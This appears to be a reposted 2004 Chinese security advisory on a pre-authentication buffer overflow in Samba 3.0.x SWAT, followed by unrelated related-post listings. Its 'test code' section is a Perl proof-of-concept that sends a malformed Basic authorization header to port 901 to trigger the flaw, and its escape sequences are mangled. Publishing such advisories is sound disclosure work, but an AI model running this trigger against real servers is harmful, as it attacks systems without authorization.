Samba 3.x SWAT预验证远程缓冲区溢出漏洞[代码]

原创 2004年08月18日 18:10:00

受影响系统

Samba 3.0.2
               Samba 3.0.3
               Samba 3.0.4

详细描述
SWAT是Samba Web管理工具。

Samba SWAT服务预验证存在缓冲区溢出问题,远程攻击者可以利用这个漏洞在系统上以SWAT进程权限执行任意指令。问题存在于source/lib/util_str.c文件中的进行HTTP Basic验证的base64_decode_data_blob函数中.

测试代码
#!/usr/bin/perl
# Samba 3.0.4 and prior's SWAT Authorization Buffer Overflow
# Created by Noam Rathaus of Beyond Security Ltd.
#

use IO::Socket;
use strict;

my $host = $ARGV[0];

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "901" );

unless ($remote) { die "cannot connect to http daemon on $host" }

print "connected/n";

$remote->autoflush(1);

my $http = "GET / HTTP/1.1/r
Host: $host:901/r
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 Firefox/0.9.1/r
Accept: text/xml/r
Accept-Language: en-us,en;q=0.5/r
Accept-Encoding: gzip,deflate/r
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7/r
Keep-Alive: 300/r
Connection: keep-alive/r
Authorization: Basic =/r
/r
";

print "HTTP: [$http]/n";
print $remote $http;
sleep(1);
print "Sent/n";

while (<$remote>)
{
print $_;
}
print "/n";

close $remote;

Delphi中两个BUG的分析与修复

Delphi中两个BUG的分析与修复  在使用Delphi 7进行三层数据库开发时,遇到了两个小问题,通过反复试验,终于找出了Delphi 7中的两个小BUG并进行了修复(好像Delphi 6中也有相...
  • lifanxi
  • lifanxi
  • 2003-05-30 15:47:00
  • 1845

Samba远程崩溃或代码执行漏洞(CVE-2015-0240)简要分析

Samba远程崩溃或代码执行漏洞(CVE-2015-0240)1.搭建samba环境注意:在Linux系统上使用源码编译来安装samba必须要将系统自带的全部关于samba的软件均删除,可用如下命令查...
  • wuyangbotianshi
  • wuyangbotianshi
  • 2015-03-07 00:17:03
  • 2309

Samba 3.x SWAT预验证远程缓冲区溢出漏洞[代码]

受影响系统 Samba 3.0.2                Samba 3.0.3                Samba 3.0.4详细描述SWAT是Samba Web管理工具。 Samba...
  • www_307
  • www_307
  • 2004-08-18 18:10:00
  • 998

samba+Xshell连接Linux共享目录

引言:之前我们在Windows下建立共享目录,然后再Linux中去访问的步骤,那么反过来,假如此时Linux服务器处于远端(例如云服务器),那就需要在Linux系统下简历共享目录,然后再Windows...
  • linshuhe1
  • linshuhe1
  • 2017-04-13 15:25:37
  • 1413

LDAP+SAMBA

( Lightweight Directory Access Protocol 輕量級名錄存取協定 ) 在 redhat 9 用 rpm包 安裝 因為 Samba3 預設就有 Ldap 支援,Sa...
  • zhouhoujia
  • zhouhoujia
  • 2012-08-28 12:24:38
  • 3173

java samba 客户端

最近需用使用java访问linux下的共享目录,实现文件下载和上传, 由于linux共享文件主要采用两种方式,samba和NFS,samba是基于Microsoft的smb/cifs协议, NFS网络...
  • i_lovefish
  • i_lovefish
  • 2013-10-07 02:18:52
  • 5268

CentOS6.5x64使用Samba架设公共盘-匿名访问

1、首先关闭selinux #vi /etc/selinux/config SELINUX=disabled 暂时关闭防火墙: #service iptables stop 永久关闭防火墙 #chkc...
  • leejianjun
  • leejianjun
  • 2017-02-23 10:43:33
  • 758

OpenCV 3.x Lib 源码结构简介

OpenCV 3.x 与之前版本的不同 1)以C++ 风格API为主,C 风格的API 最终可能会取消。 2)C++ API 更加简洁,引入很多C++面向对象的特性 3) 算法都将继承自 cv::A...
  • Real_Myth
  • Real_Myth
  • 2016-10-20 15:24:20
  • 1164

nfs samba 文件共享

首先会通过比较文件传输和文件共享两种资源交换方式来引入Samba服务的理论知识,介绍SMB协议和Samba服务程序的来由和发展过程。通过实战的部署文件共享服务来更加深入的了解Samba服务中每一行参数...
  • qq_33932782
  • qq_33932782
  • 2017-08-15 13:24:54
  • 248

centos7(x64) samba 4.2.10的配置

安装samba: yum install samba samba-client 首先配置匿名访问 编辑文件: sudo vi /etc/samba/smb.conf 在里面添加: [global...
  • niexinming
  • niexinming
  • 2016-08-14 18:36:32
  • 1293
收藏助手
不良信息举报
您举报文章:Samba 3.x SWAT预验证远程缓冲区溢出漏洞[代码]
举报原因:
原因补充:

(最多只允许输入30个字)